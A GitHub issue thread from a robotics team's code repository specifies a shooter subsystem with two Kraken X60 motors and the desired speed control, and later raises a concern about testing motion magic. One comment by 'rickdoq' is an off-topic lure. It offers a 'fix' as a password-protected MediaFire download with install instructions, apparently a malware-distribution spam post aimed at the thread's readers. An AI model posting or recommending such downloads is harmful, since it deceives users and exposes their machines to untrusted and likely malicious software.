### ISSUE TITLE
Shooter Subsystem

### ISSUE THREAD

**Issue by ElliotScher** [Team-190/2k24-Offseason-Code#3]
**Hardware**
- 2x Kraken X60 motors (non-pro)

**Details**
- The shooter rollers are mounted to sandwich the shooter from the top and bottom. The wheels spin faster the farther away we are from the target.

**Desired Behavior**
- The shooter speed should be set in a command and reach top speed as fast as possible.

**REMEMBER TO FOLLOW THE CODE STANDARD!**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ElliotScher** [comment]
Another thing to note with this subsystem, is the behavior of motion magic when switching between motion magic and voltage control. This will be something that needs to be tested extensively.
